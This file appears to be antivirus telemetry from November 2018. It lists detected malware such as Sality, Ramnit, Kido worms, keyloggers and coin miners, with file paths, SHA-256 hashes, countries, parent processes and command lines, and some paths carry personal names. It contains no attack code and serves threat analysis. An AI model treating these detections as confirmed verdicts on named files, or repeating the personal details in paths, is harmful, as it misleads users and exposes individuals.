  Row(detection=Row(filename='avscan-20181104-222013-f17706c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c952ea04\\AVSCAN-20181104-222001-EF9DDB8E\\AVSCAN-20181104-222013-F17706C1', filesize=896000, name='BDS/Hupigon.khxi.#M1.#R1'), hash='a883b670c9b5753f61478450b0f085a17d806088d9670199c5eb668f02b28baa', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:20:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='file4251_tehnologicheskaya_karta_po_tehnologii_karandashnica.exe', filepath='C:\\Users\\X\\Downloads\\file4251_tehnologicheskaya_karta_po_tehnologii_karandashnica.exe', filesize=640000, name='HEUR/AGEN.1026923.#M1.#R1'), hash='8b90d8881a736e2124534f389ac23a5e9884f9379b38defa92508a8632e9c8ae', metadata=Row(cmdline='C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\shell32.dll,OpenAs_RunDLL C:\\\\\\\\Users\\\\\\\\Home\\\\\\\\Downloads\\\\\\\\Часть вложенного сообщения', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T00:16:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='prst.dll', filepath='F:\\Users\\X\\AppData\\Local\\Temp\\sega\\Prst.dll', filesize=128000, name='TR/SPY.KeyLogger.zakea.#M1.#R1'), hash='a5ed6f4644f888a56ed7c57c53fbb6f1f7a49454db4c09a58fc6617a29b7cb1f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:34:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150910-b20294a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-150910-B20294A4', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:09:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130800-0886aa55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-130800-0886AA55', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:07:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msodru.exe', filepath='\\\\?\\C:\\ProgramData\\msodru.exe', filesize=96272000, name='TR/Taranis.2633.#M1.#R1'), hash='7a326cbfc5f5311474de48a314dc873821cc6d344ef506bbf2211de17de7a85c', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:21:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0343725.exe', filepath='F:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP435\\A0343725.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='ab257ba57ad491fd1817addd8392e913d929e398ddfb850bd7b4e60a1ff85b7c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T10:34:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:31:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c033624b0e73212d396c141901c3ea73f264e523', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\c033624b0e73212d396c141901c3ea73f264e523', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='44b8e3e3c92947070905959b2a01259c81d6bff86a045a26322f9ad47120819d', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:33:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-172713-f60b46c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-172713-F60B46C9', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:27:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='jpncy.dll', filepath='C:\\WINDOWS\\system32\\jpncy.dll', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:47:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vbe6.dll', filepath='F:\\研究生简历\\商家爱玩\\新建文件夹\\尚素英\\新建文件夹\\软件\\CAD2008能用\\AutoCAD 2008安装包\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='5a381dfef5929cbc85b788eab3459e90275f329339c74cfdf90bb3ba98832faa', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-04T15:35:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195828-10764c56', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c6048dd9\\AVSCAN-20181104-195732-0A9CA371\\AVSCAN-20181104-195828-10764C56', filesize=128000, name='TR/Krypt.lkfna.#M1.#R1'), hash='59a81ef27e74c2daa7f02178ab82d5925ba9e7be88bf43ce249b8f116e8914a5', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:58:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\Documents and Settings\\X\\Datos de programa\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:34:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='productupdt.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\4D4CAB08-5DF8-C7F3-D04A-731CF67EBD4C\\productupdt.exe', filesize=2432000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='1edf4fd8ea5c3d777994ffd006b236bdf65d60afd0c44f0c88c7aefac328f9f1', metadata=Row(cmdline='{5A75BAD5-6B27-4739-982E-F0773D08F184} S-1-5-21-2841616083-3723246947-1004576559-1003:DESKTOP-D4P446G\\\\\\\\User:Interactive:Highest[1]', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=237568, timestamp='2018-11-04T19:38:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173429-4226770f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-173429-4226770F', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:34:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-163959-502c3bec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e09dc19c\\AVSCAN-20181104-133548-4D3A2C82\\AVSCAN-20181104-163959-502C3BEC', filesize=576000, name='ADWARE/Adware.Gen.#M1.#R1'), hash='77819c68ea9d62c60de1f8e0e6ac8db837a02855c6db43d7a08a73b42efcca29', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:40:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131241-e44c23bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7ce409ba\\AVSCAN-20181104-130709-B225149F\\AVSCAN-20181104-131241-E44C23BC', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:12:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T22:20:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\aol\\1\\2\\3\\1\\1\\1\\1\\15\\3\\2\\3\\1\\1\\1\\1\\GOWIN\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:34:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b501246d6c377c9413e3595c6ded65f3f0b5756ab0b6dea91429b09a5cae9044', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B501246D6C377C9413E3595C6DED65F3F0B5756AB0B6DEA91429B09A5CAE9044', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='b501246d6c377c9413e3595c6ded65f3f0b5756ab0b6dea91429b09a5cae9044', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:30:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2543273\\noceduti.exe', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\MP3Rocket_Setup (1).exe', parentsize=1611720, timestamp='2018-11-04T20:15:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='2fa3db0f40edfde3070b39ad7f99874cb5b77153', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\2fa3db0f40edfde3070b39ad7f99874cb5b77153', filesize=320000, name='ADWARE/DealPly.Gen.#M1.#R1'), hash='599897f56ebfe0b8d2a8f34e5adee9b6b61e87111a664fd2c5e42e211cf3f21a', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:46:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ewogxhf.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\ewogxhf.exe', filesize=3072000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='0d299e2f10838d95aea903ad8570e2add8321f78d88f18987c01407de7f8861b', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:02:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cnab4mnu.exe', filepath='D:\\program\\2016\\2900\\English\\CNAB4MNU.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='a5ef8ff89ee33a80c326ff4fb0911ab60e5e34c592f95f91354addeaef20fef8', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T17:51:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='apds.dll', filepath='D:\\Windows\\SoftwareDistribution\\Download\\6d722766bb82e0437d0d3556b5f02309\\x86_microsoft-windows-servicingstack_31bf3856ad364e35_6.1.7601.23505_none_0bfc08bf3ea166ba\\apds.dll', filesize=1856000, name='W32/Ramnit.CD.#M1.#R1'), hash='10bae81cbdd98a83487262b33e98969a1c733aa6a40c791b6737e712889e6e02', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-04T12:53:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\New folder (3)\\New folder\\New folder (2)\\New folder\\New folder (2)\\Video\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T07:54:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-171759-d7b38207', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_16cd0bb0\\AVSCAN-20181104-171548-BCEDC557\\AVSCAN-20181104-171759-D7B38207', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:18:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T23:44:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T06:27:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:52:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0004769.exe', filepath='d:\\system volume information\\_restore{51d20475-b19b-4e6a-8fc3-a60e80bdc71c}\\rp12\\A0004769.exe', filesize=832000, name='W32/Neshta.A.#M1.#R1'), hash='b0fc84022365947788471d9efedd6ee0a593ee4030a2e5b9d8682aa6a6e9a205', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:39:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214012-e28bc3b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b208b16\\AVSCAN-20181104-213540-AB42781C\\AVSCAN-20181104-214012-E28BC3B6', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FI', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:39:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\\\?\\c:\\program files\\bilibili\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:18:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T05:14:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220008-9d2d2024', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-220008-9D2D2024', filesize=64000, name='TR/Siggen.rioid.#M1.#R1'), hash='5d45044066fc94a1558c3717b1bab84d8cfc17b7603b888168b9571f1b2b414e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:00:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='apiutil.exe', filepath='g:\\luisa\\studium\\topspin\\install-topspin-3.5pl2.tmp~\\windows\\bin\\apiutil.exe', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='4682a5c1a07cdefd5b0db7496c9f21f8257c3be3ae87136287b1387d2f69e6ec', metadata=Row(cmdline='-administrator', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='G:\\Luisa\\Studium\\Topspin\\install-topspin-3.5pl2.tmp~\\windows\\tcl-8.5.16\\bin\\tclsh85.exe', parentsize=102912, timestamp='2018-11-04T14:22:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205543-28c4d976', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-205543-28C4D976', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:55:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rad437cd.tmp.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Low\\rad437CD.tmp.exe', filesize=192000, name='TR/Crypt.ZPACK.cb81f1.#M1.#R1'), hash='cb81f1df90ad436d4361ef6ca29989862a01333bba713ae81b9bd3dac069361d', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\cmd.exe', parentsize=302592, timestamp='2018-11-04T19:18:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bdcdc74ea2eb6a78ec473352d02b22104aa68a75d38c710d8cefa70da05e0431', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\BDCDC74EA2EB6A78EC473352D02B22104AA68A75D38C710D8CEFA70DA05E0431', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='bdcdc74ea2eb6a78ec473352d02b22104aa68a75d38c710d8cefa70da05e0431', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:06:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='有情登入器.exe', filepath='D:\\BaiduYunDownload\\有情天堂懶人包270\\天堂(Lineage 3.63C)\\有情登入器.exe', filesize=6144000, name='HEUR/AGEN.1012077.#M1.#R1'), hash='3be0213a644cf9e36e7ecc445f7337dd6e36aa2d21beda408100a92bb2d0980e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\BaiduYunDownload\\\\\\\\有情天堂懶人包270.rar\\\\\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1472976, timestamp='2018-11-04T08:20:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:02:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='9d2cc39370b7c63899aa2b4e7afdc77d21194e09b48ceab0f1a975053eb8c3d2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\9D2CC39370B7C63899AA2B4E7AFDC77D21194E09B48CEAB0F1A975053EB8C3D2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9d2cc39370b7c63899aa2b4e7afdc77d21194e09b48ceab0f1a975053eb8c3d2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:44:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='watermark.exe', filepath='C:\\Program Files\\Microsoft\\WaterMark.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='76713ebad8aaccef88cbe580ef0b1dc9c258ff0a21b4eb6680217469f0d1da33', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T18:17:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T22:50:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='f_00041e', filepath='C:\\Users\\X\\AppData\\Roaming\\Zalo\\Cache\\f_00041e', filesize=1024000, name='HEUR/AGEN.1019326.#M1.#R1'), hash='8dd97ad2b0e142abe4d90cefe2d87cb6bba2d0f030d9f1f22378dd9bdd0a0b0a', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Programs\\Zalo\\Zalo.exe', parentsize=50125608, timestamp='2018-11-02T13:36:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rsd_prec.dll', filepath='C:\\CYPE Ingenieros\\Versión 2012\\programas\\rsd_prec.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='c198d2322c61bee515479fa52c310f610358c001a7527cf949eadfa14ecf6a38', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T13:24:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-072208-9344ed5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b7367272\\AVSCAN-20181102-072106-8AAF118B\\AVSCAN-20181102-072208-9344ED5E', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:22:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ultimatedefrag.exe', filepath='H:\\HBCD\\Programs\\ULTIMATEDEFRAG.EXE', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='filesplitterjoiner.exe', filepath='F:\\HBCD\\Programs\\FileSplitterJoiner.exe', filesize=64000, name='BDS/Rogue.766118.#M1.#R1'), hash='ebf5f18b65c3440e24aa171c5a8f60d8321e55351b8dddf02022f102f94c45de', metadata=Row(cmdline='x \\\\\\"D:\\\\\\\\JOB\\\\\\\\Keluarga Operasi Sistem\\\\\\\\Hiren + Rufus\\\\\\\\12.Hiren.s.Boot.CD.15.2.iso\\\\\\" -o\\\\\\"F:\\\\\\\\\\\\\\" -y -x![BOOT]*', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\nsh6360.tmp\\7zG.exe', parentsize=227840, timestamp='2018-11-02T08:10:11Z'), dt=datetime.date(2018, 11, 2)),
